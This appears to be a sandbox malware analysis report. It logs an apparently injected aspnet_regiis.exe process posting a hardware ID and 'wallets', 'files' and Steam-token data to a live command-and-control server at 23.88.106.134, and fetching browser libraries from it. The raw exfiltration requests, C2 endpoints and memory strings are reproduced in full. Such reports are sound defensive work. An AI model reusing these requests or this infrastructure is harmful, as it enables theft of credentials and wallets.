Source: global traffic	HTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IDBAKKECAEGCAKFIIIDHHost: 23.88.106.134Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 44 42 41 4b 4b 45 43 41 45 47 43 41 4b 46 49 49 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 61 34 39 31 64 65 62 39 32 62 63 34 61 32 30 37 38 61 30 63 32 35 62 61 62 62 61 33 35 62 30 61 66 31 66 37 63 39 61 66 63 35 31 33 65 34 33 30 34 39 61 32 34 63 34 66 38 61 35 36 66 66 32 34 66 62 38 36 61 30 62 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 41 4b 4b 45 43 41 45 47 43 41 4b 46 49 49 49 44 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 41 4b 4b 45 43 41 45 47 43 41 4b 46 49 49 49 44 48 2d 2d 0d 0a Data Ascii: ------IDBAKKECAEGCAKFIIIDHContent-Disposition: form-data; name="token"7a491deb92bc4a2078a0c25babba35b0af1f7c9afc513e43049a24c4f8a56ff24fb86a0b------IDBAKKECAEGCAKFIIIDHContent-Disposition: form-data; name="message"wallets------IDBAKKECAEGCAKFIIIDH--
Source: global traffic	HTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HDAFHIDGIJKJKECBGDBGHost: 23.88.106.134Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 61 34 39 31 64 65 62 39 32 62 63 34 61 32 30 37 38 61 30 63 32 35 62 61 62 62 61 33 35 62 30 61 66 31 66 37 63 39 61 66 63 35 31 33 65 34 33 30 34 39 61 32 34 63 34 66 38 61 35 36 66 66 32 34 66 62 38 36 61 30 62 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 46 48 49 44 47 49 4a 4b 4a 4b 45 43 42 47 44 42 47 2d 2d 0d 0a Data Ascii: ------HDAFHIDGIJKJKECBGDBGContent-Disposition: form-data; name="token"7a491deb92bc4a2078a0c25babba35b0af1f7c9afc513e43049a24c4f8a56ff24fb86a0b------HDAFHIDGIJKJKECBGDBGContent-Disposition: form-data; name="message"files------HDAFHIDGIJKJKECBGDBG--
Source: global traffic	HTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FCAEBFIJKEBGHIDHIEGIHost: 23.88.106.134Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 61 34 39 31 64 65 62 39 32 62 63 34 61 32 30 37 38 61 30 63 32 35 62 61 62 62 61 33 35 62 30 61 66 31 66 37 63 39 61 66 63 35 31 33 65 34 33 30 34 39 61 32 34 63 34 66 38 61 35 36 66 66 32 34 66 62 38 36 61 30 62 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 46 43 41 45 42 46 49 4a 4b 45 42 47 48 49 44 48 49 45 47 49 2d 2d 0d 0a Data Ascii: ------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="token"7a491deb92bc4a2078a0c25babba35b0af1f7c9afc513e43049a24c4f8a56ff24fb86a0b------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------FCAEBFIJKEBGHIDHIEGIContent-Disposition: form-data; name="file"------FCAEBFIJKEBGHIDHIEGI--
Source: global traffic	HTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAFIJDGHCBFHJKFCGIEHost: 23.88.106.134Content-Length: 99115Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAAFBFBAAKECFIEBFIECHost: 23.88.106.134Content-Length: 270Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 41 46 42 46 42 41 41 4b 45 43 46 49 45 42 46 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 61 34 39 31 64 65 62 39 32 62 63 34 61 32 30 37 38 61 30 63 32 35 62 61 62 62 61 33 35 62 30 61 66 31 66 37 63 39 61 66 63 35 31 33 65 34 33 30 34 39 61 32 34 63 34 66 38 61 35 36 66 66 32 34 66 62 38 36 61 30 62 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 46 42 46 42 41 41 4b 45 43 46 49 45 42 46 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 42 41 41 46 42 46 42 41 41 4b 45 43 46 49 45 42 46 49 45 43 2d 2d 0d 0a Data Ascii: ------BAAFBFBAAKECFIEBFIECContent-Disposition: form-data; name="token"7a491deb92bc4a2078a0c25babba35b0af1f7c9afc513e43049a24c4f8a56ff24fb86a0b------BAAFBFBAAKECFIEBFIECContent-Disposition: form-data; name="message"jbdtaijovg------BAAFBFBAAKECFIEBFIEC--

Source: Joe Sandbox View

ASN Name: ENZUINC-US ENZUINC-US

Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134
Source: unknown	TCP traffic detected without corresponding DNS query: 23.88.106.134

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Code function: 2_2_02755610 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

2_2_02755610

Source: global traffic	HTTP traffic detected: GET /566d6e1ec8db6394/sqlite3.dll HTTP/1.1Host: 23.88.106.134Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /566d6e1ec8db6394/freebl3.dll HTTP/1.1Host: 23.88.106.134Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /566d6e1ec8db6394/mozglue.dll HTTP/1.1Host: 23.88.106.134Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /566d6e1ec8db6394/msvcp140.dll HTTP/1.1Host: 23.88.106.134Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /566d6e1ec8db6394/nss3.dll HTTP/1.1Host: 23.88.106.134Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /566d6e1ec8db6394/softokn3.dll HTTP/1.1Host: 23.88.106.134Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /566d6e1ec8db6394/vcruntime140.dll HTTP/1.1Host: 23.88.106.134Cache-Control: no-cache

Source: unknown

HTTP traffic detected: POST /6a9f8e2503d99c04.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JJEGIJEGDBFHDGCAFCAEHost: 23.88.106.134Content-Length: 213Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4a 45 47 49 4a 45 47 44 42 46 48 44 47 43 41 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 43 31 39 36 30 37 37 37 34 43 43 36 36 31 31 37 39 33 34 38 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 49 4a 45 47 44 42 46 48 44 47 43 41 46 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 63 75 61 70 66 73 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 45 47 49 4a 45 47 44 42 46 48 44 47 43 41 46 43 41 45 2d 2d 0d 0a Data Ascii: ------JJEGIJEGDBFHDGCAFCAEContent-Disposition: form-data; name="hwid"8C19607774CC661179348------JJEGIJEGDBFHDGCAFCAEContent-Disposition: form-data; name="build"cuapfss------JJEGIJEGDBFHDGCAFCAE--

Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.106
Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.106.134
Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/freebl3.dll
Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/freebl3.dllYW
Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/freebl3.dlleV
Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/mozglue.dll
Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/mozglue.dllAV
Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/msvcp140.dll
Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BD7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/nss3.dll
Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BD7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/nss3.dllj9
Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/nss3.dllpera
Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/softokn3.dll
Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/softokn3.dllOV
Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/sqlite3.dll
Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/vcruntime140.dll
Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/vcruntime140.dll3x
Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.106.134/566d6e1ec8db6394/vcruntime140.dll4
Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.php
Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.php)
Source: aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.php513e43049a24c4f8a56ff24fb86a0b
Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.php6
Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.php?S
Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.phpC
Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.phpGS
Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.phpcS
Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.phpdus.wallet
Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.phpiSS
Source: aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.phpition:
Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.phpm
Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.phppenSSH
Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.phpwser
Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.106.134/6a9f8e2503d99c04.phpz
Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BA7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://23.88.106.134y
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000002.00000002.1824348994.000000006C31D000.00000002.00000001.01000000.0000000B.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: aspnet_regiis.exe, 00000002.00000002.1817001659.000000001CE4E000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1824142050.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: freebl3.dll.2.dr, nss3[1].dll.2.dr, softokn3[1].dll.2.dr, softokn3.dll.2.dr, mozglue[1].dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.dr, freebl3[1].dll.2.dr	String found in binary or memory: https://mozilla.org0/
Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.2.dr	String found in binary or memory: https://support.mozilla.org
Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.2.dr	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: ECAKKKKJDBKKFIEBKEHDGCAFCB.2.dr	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
Source: aspnet_regiis.exe, 00000002.00000003.1726461054.0000000022DDD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
